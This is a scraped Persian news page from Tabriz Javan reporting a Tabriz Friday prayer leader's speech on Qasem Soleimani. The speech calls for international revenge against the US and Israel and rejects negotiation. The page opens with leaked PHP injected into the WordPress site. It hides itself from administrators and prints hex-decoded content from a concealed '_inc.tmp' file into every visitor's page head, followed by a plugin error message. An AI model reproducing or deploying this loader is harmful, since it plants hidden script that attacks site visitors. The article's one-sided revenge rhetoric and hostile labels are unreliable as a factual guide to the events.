if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } }
Warning: session_start(): Cannot start session when headers already sent in /home3/tabrizj3/public_html/wp-content/plugins/wp-seo-booster-pro/wp-seo-booster-pro.php on line 44
انتقام سخت از آمریکا دامن صهیونیست‎ها را هم می‌گیرد/ انتقام خون پاک شهید سلیمانی باید یک انتقام بین‌المللی باشد - تبریز جوان
کد خبر : 16324
تاریخ انتشار : پنجشنبه ۱۹ دی ۱۳۹۸ - ۲:۰۸

انتقام سخت از آمریکا دامن صهیونیست‎ها را هم می‌گیرد/ انتقام خون پاک شهید سلیمانی باید یک انتقام بین‌المللی باشد

انتقام سخت از آمریکا دامن صهیونیست‎ها را هم می‌گیرد/ انتقام خون پاک شهید سلیمانی باید یک انتقام بین‌المللی باشد

به گزارش تبریز جوان حجت‌الاسلام و المسلمین سیدمحمد علی آل هاشم در مراسم بزرگداشت شهید حاج قاسم سلیمانی و همرزمان شهیدش در دانشگاه تبریز با بیان اینکه  شهید سلیمانی، شخصیتی ملی و انقلابی بوده و باید دربرابر ایثار و فداکاری این چهره ملی تعظیم کرد اظهار داشت: تاثیر گزاری تفکر ایشان بر اقشار مختلف مردم


به گزارش تبریز جوان حجت‌الاسلام و المسلمین سیدمحمد علی آل هاشم در مراسم بزرگداشت شهید حاج قاسم سلیمانی و همرزمان شهیدش در دانشگاه تبریز با بیان اینکه  شهید سلیمانی، شخصیتی ملی و انقلابی بوده و باید دربرابر ایثار و فداکاری این چهره ملی تعظیم کرد اظهار داشت: تاثیر گزاری تفکر ایشان بر اقشار مختلف مردم در تشییع پیکر پاکش مشهود بود و باید این تفکر در کشور ما ماندگار شود.

امام جمعه تبریز با تاکید بر پرهیز از هر گونه تحلیل در خصوص شخصیت این شهید والا مقام که مسایل جناحی را دامن بزند؛ گفت: شهید سلیمانی یک چهره انقلابی به معنای واقعی کلمه بود و خود را سرباز ولایت می‌دانست و بر ولایی بودن خودش اصرار می‌کرد. شهید سلیمانی چهره بین‌المللی مقاومت اسلامی و سیدالشهدای جبهه مقاومت اسلامی است که فرزندان جبهه انقلاب اسلامی را در کشورهای مختلف تربیت کرد و امروز هر نیروی مجاهد و مقاومی که در هر جای منطقه می‌بینیم، تحت تاثیر مجاهدت‌های این سردار بزرگ اسلام است.

وی ادامه داد: او یک شخصیت صرفا نظامی نبود، او مردی بزرگ  و دلسوز برای رزمندگان اسلام و به خصوص رزمندگان مدافع حرم بود و فرزندان شهدای مدافع حرم از ابعاد مختلف به سردار سلیمانی، عشق می‌ورزیدند و او هم به مشکلات فرزندان شهدای مدافع حرم رسیدگی می‌کرد.

امام جمعه تبریز با اشاره به اینکه سردار قاسم سلیمانی یک شخصیت فرهنگی-اجتماعی هم بود و در خدمت رسانی به مردم همیشه پیشگام بود، اظهار داشت : شاید کم‌تر کسی میداند که راه اندازی و توسعه مواکب اربعین حسینی مخصوص این شخصیت بزرگ و اجتماعی بود و دستور مستقیم او برای ورود مواکب اربعین حسینی به مناطق سیل زده در سیل فروردین سال  جاری، هرگز فراموش نمی‌شود.

وی ادامه داد: اگر تحلیلی در مورد ترور شهید سلیمانی داشته باشیم، این است که احتمال دارد عامل اصلی ترور شهید سلیمانی اسراییل پلید باشد، با توجه به پرواز شهید سلیمانی از سوریه به عراق، رهگیری مسیر پرواز ایشان توسط صهیونیست‌ها بسیار محتمل است، ولی آمریکا و ترامپ که نوکران صهیونیسم جهانی هستند، خواستند خودشان را با این ترور مطرح کنند.

حجت الاسلام و المسلمین آل هاشم با بیان اینک با اقتدا بر رهبر حکیم انقلاب اسلامی باید هجمه‌های تبلیغاتی و تحلیلی‌مان به سمت آمریکا و به سمت صهیونیسم و ارتجاع منطقه برود، گفت : شهادت سردار مقاومت اسلامی باید نماد وحدت و همبستگی ملی و منطقه‌ای باشد و از هر گونه تحلیلی که شائبه حساب‌های سیاسی  دارد، اجتناب کرده و با تمام توان و برنامه‌ریزی، مراسم تجلیل از سردار سلیمانی را با شکوه ادامه داد تا این مراسم، جلوه گاه وحدت ملی و مردمی باشد.

وی تاکید کرد: شایسته است که در کنار سوگ و عزاداری فقدان این بزرگ مرد اسلام و ایران، وجه حماسی شهادت نیز مطرح و برجسته شود و مراسم آن شهید، پایگاه اظهار برائت و نفرت ملی  و جهانی علیه آمریکا و صهیونیسم بشود.

نماینده ولی فقیه در آذربایجان شرقی گفت: با عنایت به فضاسازی‌ها برای  تشدید اختلافات ساختگی در میان ملت برادر ایران و عراق باید فرصت توطئه را به دشمنان نداد، در مراسم این شهید بزرگوار به همراهی و نقش حشدالشعبی و شهید ابولمهدی المهندس و دیگر همراهان ایرانی و عراقی که در نجات عراق از چنگال تکفیری‌ها نقش داشتند، نیز توجه شود.

وی با بیان اینکه سپاه پاسداران انقلاب اسلامی در۴۰ سال گذشته ۴۰ هزارشهید  تقدیم انقلاب و مقاومت اسلامی کرده است، تصریح کرد: نقش سپاه و نیروی قدس سپاه در حراست از کشور باید برجسته شود، باید حمایت و پشتیبانی خود را از منصوب رهبری، فرمانده جدید نیروی سپاه قدس اعلام کنیم تا بدانند ملت ایران اسلامی پشتیبان سردار قاآنی و سپاه است.

امام جمعه تبریز گفت: امروز، سردار قاآنی، یک سلیمانی دیگر است و ما نباید از این مسئله غفلت کنیم.

نماینده ولی فقیه در استان تاکید کرد: باید در بهترین زمان ممکن و با برنامه‌ریزی و طراحی بسته اقدام در ابعاد مختلف اقدام و از تمام ظرفیت‌ها استفاده کرده و به مطالبه مردمی انتقام، توجه شود.

حجت الاسلام و المسلمین آل هاشم گفت : انتقام خون پاک شهید سلیمانی و ابومهدی المهندس، باید یک انتقام بین‌المللی باشد، کشورهای اسلامی هم باید به دنبال این انتقام باشند، دشمنان درصددند انتصاب سردار قاآنی را کم رنگ جلوه دهند، متاسفانه ما هم درتبلیغاتمان به این نکته توجه نداریم، آن‌ها می‌خواهند نشان دهند که سردار قاآنی دیگر سلیمانی نیست، همه مردم باید از این شخصیت، حمایت و تجلیل کنند.

وی در ادامه با اشاره به فرمایشات رهبر معظم انقلاب در دیدار امروزشان با مردم قم، اظهار کرد: اخلاص سردار سلیمانی بود که پیرو جوان و کودک و بزرگ را به مراسم تشییع کشاند، این شهید بزرگوار در مسایل داخلی کشور، اهل حزب و  جناح نبود، اما به شدت انقلابی و انقلاب و انقلابی‌گری خط قرمز قطعی او بود، برخی سعی نکنند این واقعیت را کم رنگ، جلوه دهند، چرا که او ذوب در ولایت بود.

حجت الاسلام و المسلمین آل هاشم تصریح کرد: باید بیشتر به شجاعت او بپردازیم، شاید برخی دوستان ندانند اوبه کمک ملت‌های منطقه، توانست نقشه‌های شوم و نامشروع آمریکا را در منطقه غرب آسیا خنثی کند، آمریکا تلاش می‌کرد فلسطین را ضعیف نگه دارد، اما این مرد الهی دست فلسطینی را هم پر و کاری کرد در منطقه کوچکی در نوار غزه در مقابل رژیم صهیونیستی بایستند و آمریکایی‌ها مایل بودند عراق را مانند رژیم طاغوت سعودی بکنند و منقطه‌ای پر از نفت در اختیار آن‌ها باشد و هر کاری که مایل هستند، انجام دهند.

وی در ادامه از جان باختن تعدادی از هموطنانمان در مراسم تشییع در کرمان ابراز تاسف کرد و گفت: این حادثه تلخ دیروز کرمان موجب ناراحتی مردم و نظام شد.

وی متذکر شد: آمریکایی‌ها اصرار دارند، فساد و ویرانگری را در جمهوری اسلامی ایران هم داشته باشند و مذاکره و پشت میز نشستن‌ها مقدمه دخالت و حضور آن‌ها است، گول نخوریم و دنبال مذاکره و صحبت نرویم، ملت حضور آمریکا در کشورهای منطقه را قبول نمی‌کنند.
 

انتهای پیام/۶۰۰۰۲ 

برچسب ها :

ناموجود
ارسال نظر شما
مجموع نظرات : 0 در انتظار بررسی : 0 انتشار یافته : 0
  • نظرات ارسال شده توسط شما، پس از تایید توسط مدیران سایت منتشر خواهد شد.
  • نظراتی که حاوی تهمت یا افترا باشد منتشر نخواهد شد.
  • نظراتی که به غیر از زبان فارسی یا غیر مرتبط با خبر باشد منتشر نخواهد شد.